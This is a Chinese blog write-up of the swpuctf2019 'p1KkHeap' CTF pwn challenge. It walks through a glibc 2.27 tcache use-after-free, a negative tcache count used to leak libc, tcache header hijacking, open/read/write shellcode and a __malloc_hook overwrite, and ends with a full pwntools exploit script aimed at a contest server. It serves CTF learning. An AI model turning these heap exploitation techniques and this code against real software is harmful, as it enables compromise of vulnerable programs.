swpuctf2019 p1KkHeap 详细题解

最新推荐文章于 2024-04-28 05:03:36 发布
最新推荐文章于 2024-04-28 05:03:36 发布
阅读量1.4k 收藏 1
点赞数 8
分类专栏: pwn CTF 二进制漏洞 文章标签: PWN CTF 二进制漏洞 缓冲区溢出 逆向工程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/103450524
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏

p1KkHeap

这是swpuctf2019的一题,让我们来详细分析一下

本题的知识点:tcache bin,unsorted bin,malloc hook

首先,我们检查一下程序的保护机制,发现保护全开

然后,我们用IDA分析一下

最大允许创建0x100的堆,并且最多有8个堆

漏洞点在这里,free后,只把大小置为0,而没有把堆指针置为0,存在UAF漏洞

本题,delete功能还有一个限制

delete功能只能用3次,超过会结束程序

然后是edit功能,根据数组里保存的大小读取字符,我们free后,那个大小设置为了0,因此就不能用原来的下标去edit释放的堆,而应该create后分配到原来的堆,再edit

show功能,可以泄露信息

程序还有一个限制

程序最多只能调用18次功能,超过后程序结束。

然后,我们看看给我们的libc版本为2.27

程序还使用了沙箱机制,可能禁用了某些系统调用

我们检测一下

execve被禁用,意味着我们不能调用systemonegadgetgetshell

我们先做一个总结:

  1. Delete只能用3
  2. 程序最多只能调用18次功能
  3. 程序中存在堆指针UAF,可造成double free
  4. Libc版本为2.27,存在tcache机制,且2.27版本的tcache不检查double free(更高版本有检查)
  5. Show功能可以用来泄露地址信息
  6. edit功能可以用来修改
  7. execve被禁用,我们应该构造shellcode或者ROP来直接读取flag

 

首先想想,我们该如何触发shellcode或ROP,在这,我们可以攻击__malloc_hook,将shellcode的地址写入到__malloc_hook,在这里,ROP显然很麻烦,因为ROP还要做栈转移,并且需要先前依靠一段shellcode来转移栈,如果供我们存放shellcode的地方空间很小,那么我们可以考虑写一段简短的shellcode,将栈转移,但是,如果我们有足够的空间来放shellcode,那么,直接把读取和输出flagshellcode写到那个空间。

对于可写shellcode的空间很小,我还想到了另外一种方法,那就是写一段简短的shellcode,来调用int mprotect(const void *start, size_t len, int prot)函数,将某地址处属性修改为可执行,比如,我们可以把某个堆修改为可执行,那么就能在堆里布下shellcode

好吧,说了这么多,其实这题,我们是有足够的空间来写shellcode的,所以就不用那么麻烦。

程序在0x66660000这个固定的地址处映射了0x1000大小的空间,并且属性为RWX,既可读写,也具有执行属性,并且地址固定为0x66660000,使得我们更加方便。

所以,我们决定把shellcode写到0x66660000处,然后攻击malloc_hook,在malloc_hook处写入0x66660000,这样,当我们再次malloc时,就会执行shellcode。

那么,现在开始攻击吧

首先,需要泄露一些地址,那么需要用到unsorted bin,但是,由于tcache的存在,对应的tcache bin满7个,接下来的堆块才会放入unsorted bin。满7个,就必须delete 7次,本题最多只能用3次,显然这个方案不可行。让我们来看看tcache 相关的源代码

  1. struct malloc_par  
  2. {  
  3.   /* Tunable parameters */  
  4.   unsigned long trim_threshold;  
  5.   INTERNAL_SIZE_T top_pad;  
  6.   INTERNAL_SIZE_T mmap_threshold;  
  7.   INTERNAL_SIZE_T arena_test;  
  8.   INTERNAL_SIZE_T arena_max;  
  9.   
  10.   /* Memory map support */  
  11.   int n_mmaps;  
  12.   int n_mmaps_max;  
  13.   int max_n_mmaps;  
  14.   /* the mmap_threshold is dynamic, until the user sets 
  15.      it manually, at which point we need to disable any 
  16.      dynamic behavior. */  
  17.   int no_dyn_threshold;  
  18.   
  19.   /* Statistics */  
  20.   INTERNAL_SIZE_T mmapped_mem;  
  21.   INTERNAL_SIZE_T max_mmapped_mem;  
  22.   
  23.   /* First address handed out by MORECORE/sbrk.  */  
  24.   char *sbrk_base;  
  25.   
  26. #if USE_TCACHE  
  27.   /* Maximum number of buckets to use.  */  
  28.   size_t tcache_bins;  
  29.   size_t tcache_max_bytes;  
  30.   /* Maximum number of chunks in each bucket.  */  
  31.   size_t tcache_count;  
  32.   /* Maximum number of chunks to remove from the unsorted list, which 
  33.      aren't used to prefill the cache.  */  
  34.   size_t tcache_unsorted_limit;  
  35. #endif  
  36. };  
  37.   
  38. static struct malloc_par mp_ =  
  39. {  
  40.   .top_pad = DEFAULT_TOP_PAD,  
  41.   .n_mmaps_max = DEFAULT_MMAP_MAX,  
  42.   .mmap_threshold = DEFAULT_MMAP_THRESHOLD,  
  43.   .trim_threshold = DEFAULT_TRIM_THRESHOLD,  
  44. #define NARENAS_FROM_NCORES(n) ((n) * (sizeof (long) == 4 ? 2 : 8))  
  45.   .arena_test = NARENAS_FROM_NCORES (1)  
  46. #if USE_TCACHE  
  47.   ,  
  48.   .tcache_count = TCACHE_FILL_COUNT,  
  49.   .tcache_bins = TCACHE_MAX_BINS,  
  50.   .tcache_max_bytes = tidx2usize (TCACHE_MAX_BINS-1),  
  51.   .tcache_unsorted_limit = 0 /* No limit.  */  
  52. #endif  
  53. };  

注意,size_t tcache_bins;是无符号的

然后,看这里

  1. #if USE_TCACHE  
  2.   {  
  3.     size_t tc_idx = csize2tidx (size);  
  4.   
  5.     if (tcache  
  6.     && tc_idx < mp_.tcache_bins  
  7.     && tcache->counts[tc_idx] < mp_.tcache_count)  
  8.       {  
  9.     tcache_put (p, tc_idx);  
  10.     return;  
  11.       }  
  12.   }  
  13. #endif  

其中counts是有符号数组

看似,好像不会出什么问题,我们来看看这样的C语言代码

  1. #include <stdio.h>  
  2.   
  3. int main() {  
  4.     size_t a = 7;  
  5.     int b = -1;  
  6.     printf("b<a? %d",b<a);  
  7.     return 0;  
  8. }  

程序的执行结果

由此,我们知道了,当一个有符号数和一个无符号数进行比较时,有符号数会先转换成无符号数,然后再进行比较。

重点在这

那么,假设,我们double free同一个堆,那么在tcache bin里就会构成循环链表,此时count=2然后,我们再create 3个一样大小的堆,那么count就变成了-1,此时,我们delete一个unsorted bin范围的堆,这个堆就会放入unsorted bin,然后我们用show功能就能泄露出libc中的指针。

形成双向链表,那么我们create后,写入一个新地址,那么新地址就会链接到tcache bin链表的后面,我们看看

那么,我们再malloc 2次,就可以分配到aaaaaaaa处,但是注意,这种方法,我们只能攻击一次,也就是说,我们攻击了malloc_hook后,就攻击不了0x66660000,攻击了0x66660000就攻击不了malloc_hook了,二者不可兼得。因为不再是循环链表,并且delete只能用3次,不能再构建循环链表了。

解决方法是,我们用一次攻击,直接去攻击tcache bin的表头,那么,下次,我们就能直接修改表头,来决定下一次堆分配到哪个地方。

tcache bin的表头是在堆中的,一般在第一个堆的前面某次,我们用IDA找到

我们找到了表头指针的位置,它距离第一个堆的位置是- 0x188个字节。

因此,我们要攻击这里,修改表头指针,这样就能决定下一次分配的位置了。

 

那么,我们需要先泄露第一个堆的地址

  1. #chunk0  
  2. create(0x100)  
  3. #chunk1,用来挡住chunk0top块,这样chunk0放入unsorted bin时不会发生合并,指针就会保留在chunk0  
  4. create(0x40)  
  5.   
  6. #chunk0和自己形成双向链表  
  7. delete(0)  
  8. delete(0)  
  9. #泄露chunk0的堆地址  
  10. show(0)  
  11. sh.recvuntil('content: ')  
  12. heap_addr = u64(sh.recv(6).ljust(8,'\x00')) - 0x10  
  13.   
  14. #得到tcache存放表头的地址  
  15. tcache_head_addr = heap_addr - 0x188  

得到了表头地址,那么我们就要开始攻击表头了

  1. #chunk2  
  2. create(0x100)  
  3. #chunk0fd指向表头指针处  
  4. edit(2,p64(tcache_head_addr))  
  5. #chunk3  
  6. create(0x100)  
  7. #chunk4chunk4tcache存放表头指针的位置,我们edit chunk4,就能修改tcache的表头  
  8. #现在tcache count变成了-1,由于是无符号数,导致比较时>7成立  
  9. create(0x100)  

现在chunk4就是表头指针处的空间,我们edit chunk4,就能修改表头指针

  1. #chunk0进入unsorted bin  
  2. delete(0)  
  3. #泄露main_arena+96的地址  
  4. show(0)  
  5. sh.recvuntil('content: ')  
  6.   
  7. main_arena_96 = u64(sh.recv(6).ljust(8,'\x00'))  
  8. malloc_hook_addr = (main_arena_96 & 0xFFFFFFFFFFFFFF00) + (malloc_hook_s & 0xFF)  
  9. libc_base = malloc_hook_addr - malloc_hook_s  
  10. open_addr = libc_base + open_s  
  11. read_addr = libc_base + read_s  
  12. write_addr = libc_base + write_s  

我们先来攻击0x66660000,写入shellcode

  1. #将表头指向0x66660000,这样我们就能分配到这里了  
  2. edit(4,p64(0x66660000))  
  3.   
  4. #'flag.txt'  
  5. shellcode = asm('mov rax,0x7478742E67616C66')  
  6. shellcode += asm('push 0x0')  
  7. shellcode += asm('push rax')  
  8. #rsi = 0  
  9. shellcode += asm('mov rsi,0')  
  10. shellcode += asm('mov rdi,rsp')  
  11. #call open  
  12. shellcode += asm('mov rax,' + hex(open_addr))  
  13. shellcode += asm('call rax')  
  14. #fd  
  15. shellcode += asm('mov rdi,rax')  
  16. #buf  
  17. shellcode += asm('mov rsi,rsp')  
  18. #len  
  19. shellcode += asm('mov rdx,0x30')  
  20. #call read  
  21. shellcode += asm('mov rax,' + hex(read_addr))  
  22. shellcode += asm('call rax')  
  23. #fd  
  24. shellcode += asm('mov rdi,1')  
  25. ##buf  
  26. shellcode += asm('mov rsi,rsp')  
  27. #len  
  28. shellcode += asm('mov rdx,0x30')  
  29. #call write  
  30. shellcode += asm('mov rax,' + hex(write_addr))  
  31. shellcode += asm('call rax')  
  32.   
  33. #chunk5分配到了0x66660000  
  34. create(0x100)  
  35. #写入shellcode0x66660000  
  36. edit(5,shellcode)  

接下来,我们攻击malloc_hook,然后触发malloc_hook

  1. #malloc_hook设置为tcache bin表头  
  2. edit(4,p64(malloc_hook_addr))  
  3. #chunk6分配到malloc_hook  
  4. create(0x100)  
  5.   
  6. #malloc_hook  
  7. edit(6,p64(0x66660000))  
  8.   
  9. #触发malloc hook去执行我们在0x66660000处布下的shellcode  
  10. create(0x1)  

最终,我们得到了flag

综上,我们的exp脚本如下

  1. #coding:utf8  
  2. #思想:攻击tcache表头  
  3. from pwn import *  
  4.   
  5. #sh = process('./p1KkHeap')  
  6. context(arch='amd64',os='linux')  
  7. sh = remote('39.98.64.24',9091)  
  8. #libc_path = '/lib/x86_64-linux-gnu/libc-2.27.so'  
  9. libc_path = './libc.so.6'  
  10. libc = ELF(libc_path)  
  11. malloc_hook_s = libc.symbols['__malloc_hook']  
  12. open_s = libc.sym['open']  
  13. read_s = libc.sym['read']  
  14. write_s = libc.sym['write']  
  15.   
  16. def create(size):  
  17.    sh.sendlineafter('Your Choice:','1')  
  18.    sh.sendlineafter('size:',str(size))  
  19.   
  20. def show(index):  
  21.    sh.sendlineafter('Your Choice:','2')  
  22.    sh.sendlineafter('id:',str(index))  
  23.   
  24. def edit(index,content):  
  25.    sh.sendlineafter('Your Choice:','3')  
  26.    sh.sendlineafter('id:',str(index))  
  27.    sh.sendafter('content:',content)  
  28.   
  29. def delete(index):  
  30.    sh.sendlineafter('Your Choice:','4')  
  31.    sh.sendlineafter('id:',str(index))  
  32.   
  33. #chunk0  
  34. create(0x100)  
  35. #chunk1,用来挡住chunk0top块,这样chunk0放入unsorted bin时不会发生合并,指针就会保留在chunk0  
  36. create(0x40)  
  37.   
  38. #chunk0和自己形成双向链表  
  39. delete(0)  
  40. delete(0)  
  41. #泄露chunk0的堆地址  
  42. show(0)  
  43. sh.recvuntil('content: ')  
  44. heap_addr = u64(sh.recv(6).ljust(8,'\x00')) - 0x10  
  45.   
  46. #得到tcache存放表头的地址  
  47. tcache_head_addr = heap_addr - 0x188  
  48.   
  49. #chunk2  
  50. create(0x100)  
  51. #chunk0fd指向表头指针处  
  52. edit(2,p64(tcache_head_addr))  
  53. #chunk3  
  54. create(0x100)  
  55. #chunk4chunk4tcache存放表头指针的位置,我们edit chunk4,就能修改tcache的表头  
  56. #现在tcache count变成了-1,由于是无符号数,导致比较时>7成立  
  57. create(0x100)  
  58. #chunk0进入unsorted bin  
  59. delete(0)  
  60. #泄露main_arena+96的地址  
  61. show(0)  
  62. sh.recvuntil('content: ')  
  63.   
  64. main_arena_96 = u64(sh.recv(6).ljust(8,'\x00'))  
  65. malloc_hook_addr = (main_arena_96 & 0xFFFFFFFFFFFFFF00) + (malloc_hook_s & 0xFF)  
  66. libc_base = malloc_hook_addr - malloc_hook_s  
  67. open_addr = libc_base + open_s  
  68. read_addr = libc_base + read_s  
  69. write_addr = libc_base + write_s  
  70.   
  71.   
  72. #将表头指向0x66660000,这样我们就能分配到这里了  
  73. edit(4,p64(0x66660000))  
  74.   
  75. #'flag.txt'  
  76. shellcode = asm('mov rax,0x7478742E67616C66')  
  77. shellcode += asm('push 0x0')  
  78. shellcode += asm('push rax')  
  79. #rsi = 0  
  80. shellcode += asm('mov rsi,0')  
  81. shellcode += asm('mov rdi,rsp')  
  82. #call open  
  83. shellcode += asm('mov rax,' + hex(open_addr))  
  84. shellcode += asm('call rax')  
  85. #fd  
  86. shellcode += asm('mov rdi,rax')  
  87. #buf  
  88. shellcode += asm('mov rsi,rsp')  
  89. #len  
  90. shellcode += asm('mov rdx,0x30')  
  91. #call read  
  92. shellcode += asm('mov rax,' + hex(read_addr))  
  93. shellcode += asm('call rax')  
  94. #fd  
  95. shellcode += asm('mov rdi,1')  
  96. ##buf  
  97. shellcode += asm('mov rsi,rsp')  
  98. #len  
  99. shellcode += asm('mov rdx,0x30')  
  100. #call write  
  101. shellcode += asm('mov rax,' + hex(write_addr))  
  102. shellcode += asm('call rax')  
  103.   
  104. #chunk5分配到了0x66660000  
  105. create(0x100)  
  106. #写入shellcode0x66660000  
  107. edit(5,shellcode)  
  108.   
  109. print 'libc_base=',hex(libc_base)  
  110. print 'malloc_hook_addr=',hex(malloc_hook_addr)  
  111.   
  112.   
  113. #malloc_hook设置为tcache bin表头  
  114. edit(4,p64(malloc_hook_addr))  
  115. #chunk6分配到malloc_hook  
  116. create(0x100)  
  117.   
  118. #malloc_hook  
  119. edit(6,p64(0x66660000))  
  120.   
  121. #触发malloc hook去执行我们在0x66660000处布下的shellcode  
  122. create(0x1)  
  123.   
  124. sh.interactive()  

本题,我学到了绕过tcache bin的新方法,就是使得tcache bincount为负数,还有就是攻击表头,在这次碰巧学到了,这是以前我不知道的。

ha1vk
关注
  • 8
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
CyBRICS CTF Quals 2019 Web 题解1
08-04
在CyBRICS CTF Quals 2019的Web挑战中,参赛者遇到了一系列涉及前端、后端以及加密解密的问题。以下是针对题目提供的部分解题思路和知识点的详细说明: 1. **Warmup**: - **URL重定向**:这个挑战中,网站最初...
2019正睿Day1题解.pdf
10-15
正睿2019Day1题解 T1序列seq T2灯泡bulb T3比赛match
CTF PWNheap入门 unlink
L2329794714的博客
09-09 1642
unlink的利用需要申请连续的chunk,为了方便我们先要让IO两个缓冲区都申请了,即程序执行至少以此IO输出,一次IO此输入(这里可以让程序执行一遍创建堆块的流程实现),后面再创建两个相邻的堆块,后面一个大小大于0x80,再前一个堆块里伪造一个释放状态的chunk,并利用堆溢出改写后一个chunk的P_size(伪造chunk的大小包括chunk头),和size(in_user为为0),然后free后面的chunk来触发前合并,从而进行unlink。P:为要取出的chunk指针(指向chunk头的)
SWPUCTF_2019_p1KkHeap
z1r0的博客
03-12 219
SWPUCTF_2019_p1KkHeap 查看保护 开了沙盒,用orw来读即可。 这里mmap了0x66660000这一段内存rwx权限。所以我们可以将shellcode放入这里。 一个uaf漏洞 攻击思路:因为有一个uaf,便是delete只能用三次。所以可以考虑攻击tcache这个结构体。然后劫持这个结构体实现任意地址分配 1.首先需要泄露一个heap_addr用这个heap_addr来计算出tcache的地址。创建的堆块超过fatstbin的大小即可。 这里笔者选的是0x100 2.泄露出了
CTF 全讲解:[SWPUCTF 2024 新生赛]Do_you_know_http
最新发布
2401_84281748的博客
04-28 536
因此,在安全性要求较高的情况下,应该使用其他方式来验证客户端的身份。Web开发人员和服务器管理员通常使用 User-Agent 请求头来识别客户端的类型和版本,以确保网站或应用程序能够提供适当的内容或功能。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。可以帮助用户识别潜在的安全漏洞,进行渗透测试,以及执行各种与网络安全相关的任务。是为了让服务器能够根据客户端的不同特性来适配响应内容,以提供更好的用户体验。
SWPUCTF_2019_p1KkHeap(负溢出tcache)de1ctf_2019_weapon(IO_FILE泄露libc)
weixin_46521144的博客
08-04 370
SWPUCTF_2019_p1KkHeap IDA分析 用IDA反编译发现,此题操作有如下限制 顺便说一下,buu上的所有ubuntu18的题目都是带tcache-double-free的,其实这不太好,怕养成习惯这样解题。 这里可以看到的是,对delete和add有明显的次数限制,不能简单的tcache-poisoning来泄露libc。本题一开始也是卡在这里,没有别的思路。 之后参考了别人的wp,发现tcache的管理块其实存在一些漏洞。这里记录一下 // tcache结构定义中的部分代码 #if U
蓝桥杯-蓝桥杯2019VIP题目+题解.zip
03-04
《蓝桥杯2019VIP题目+题解》是一个针对“蓝桥杯”编程竞赛的资源包,其中包含了该赛事2019年度的VIP级别试题及其解答。这个压缩包是参赛者或者对编程竞赛感兴趣的学习者的重要参考资料,旨在帮助他们提升编程技能,...
2019正睿Day2题解.pdf
10-15
2019正睿Day2题解 T1石子stone T2内存memory T3子集subset
ZJOI2019题面以及简要题解
03-27
《ZJOI2019题面以及简要题解》 ZJOI,全称为“中国中学生程序设计竞赛”,是一项旨在提升中学生计算机科学素养、培养算法思维能力的重要赛事。2019年的ZJOI吸引了众多编程爱好者参与,尽管有些人未能亲临现场,但...
2016 SWPU CTF web4
10-31
2016 SWPU CTF web4 题目的源码压缩包,压缩包地址是:http://web4.08067.me/web/web.zip,如果服务器关了就只有这里有了
pwn】SWPUCTF_2019_p1KkHeap
Nothing
12-10 681
libc-2.27.so下的一道tcache堆题。 例行检查 保护全开。 分析程序,在进入菜单之前,有一个函数跟入查看。 注意到这边用mmap函数在0x66660000映射了一块大小为0x1000的内存空间,权限是rwx。然后用prctl函数做了一个沙箱。我们查看以下禁用了什么调用。 可见execve被禁用,于是system函数和onegadget都不可行。于是就只能自己将shellcode(or...
2019 D^3CTF unprintableV详细题解
seaaseesa的博客
11-30 1544
unprintableV 这是2019 d3ctf的一道pwn题,由于当时知识储备不够没做出来,赛后就好好研究,从中学到了新的知识 本题用到的知识有:ROP、stdout指针与stderr指针、栈迁移、格式化字符串漏洞 首先,我们检查一下程序的保护机制 除了canary,其它的保护都开了 然后,我们用IDA分析一下 这个沙箱函数,把execve函数给禁用了,所以,我们不能getsh...
swpuctf2019 p1KkHeap
wuyvle的博客
04-04 995
这个函数用mmap映射了一大块内存,而且开了沙盒,我们可以知道禁用见execve,于是system函数和onegadget都不可行。于是就只能自己将shellcode(orw)写到0x66660000这个内存空间上,然后再想办法劫持到这边运行。 我们看看free函数 典型的uaf漏洞 这个2.27版本的,我们一般利用unsorted attach方式来泄露libc,但是我们发现free有限制,只能泄露3次,不能泄露到unsorted bins,但是我们发现但是tcache->count是一个无符号.
swpuctf2019 Login pwn详细题解
seaaseesa的博客
12-09 1652
Login 这是swpuctf2019的第二道pwn题,主要考点就是非栈上的字符串格式化漏洞利用。 首先,我们检查一下程序的保护机制 PIE和RELRO没有开启,那么我们可以轻易的利用漏洞修改GOT表 我们用IDA分析一下 在这里,有一个明显的格式化字符串漏洞,由于s1不是在栈上,而是在bss段里,所以漏洞利用起来会比栈上的字符串格式化漏洞稍微繁琐一些。由于外层是一个死循环,所以...
攻防世界PWN之Babyheap(null off by one)题解
seaaseesa的博客
11-20 2075
Babyheap(null off by one) 本题用到的知识 malloc_hook、realloc_hook、fastbin attack、unsorted bin合并 首先,检查一下程序的保护机制,保护全开 然后用IDA分析,发现在创建并读入数据时,有一个null off by one漏洞 我们所能利用的也就是这个漏洞 第一步仍然是想办法泄露一些关键地址 由于可以溢...
攻防世界PWN之house_of_grey题解
seaaseesa的博客
12-09 1788
house_of_grey 首先,检查一下程序的保护机制,发现保护全开 然后,我们用IDA分析一下 发现是一个读取文件并显示的程序,除了flag文件,其他文件都可以读取 程序有个缓冲区溢出漏洞 可以溢出,修改v8指针,然后我们就可以利用功能4,实现任意地址写 由于可以读取除了flag之外的文件,那么我们可以读取/proc/self/maps文件 Linux 内核提...
tcache attack
yeshen4328的专栏
11-01 188
tcache attack tcache double free double free可以通过对同一块内存free两次,实现任意地址写。当libc版本在2.26以上时,free的块优先放入tcache,malloc也优先从tcache中取,性能更好。但是安全检查变弱了。 static void tcache_put (mchunkptr chunk, size_t tc_idx) { tcache_entry *e = (tcache_entry *) chunk2mem (chunk); ass
bugku ctf sqli-0x1题解
03-23
bugku ctf是一个CTF(Capture The Flag)比赛平台,提供各种类型的安全挑战题目供参赛者解答。sqli-0x1是其中一个SQL注入题目,下面是该题目的解题思路: 1. 题目描述:sqli-0x1是一个简单的SQL注入题目,要求获取数据库中的某个表的内容。 2. 分析注入点:首先,我们需要找到注入点。可以通过在输入框中输入一些特殊字符(如'、"、;等)来尝试触发SQL注入。如果页面返回异常或者显示不正常,那么很可能存在注入点。 3. 判断注入类型:确定注入点后,我们需要判断注入类型。可以通过在输入框中输入一些测试语句(如' or 1=1--)来判断是否存在注入漏洞。如果页面返回正常,那么很可能存在注入漏洞。 4. 获取数据库信息:一旦确认存在注入漏洞,我们可以通过构造合适的SQL语句来获取数据库信息。可以使用UNION SELECT语句来获取表的列数和列名,然后使用SELECT语句获取表的内容。 5. 构造SQL语句:根据题目要求,我们需要获取某个表的内容。可以使用如下语句来获取表的内容: SELECT column_name FROM information_schema.columns WHERE table_name='表名'; SELECT * FROM 表名; 6. 获取结果:根据构造的SQL语句,将其作为输入发送给服务器,获取返回的结果。根据返回的结果,我们可以得到表的列数、列名和表的内容。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值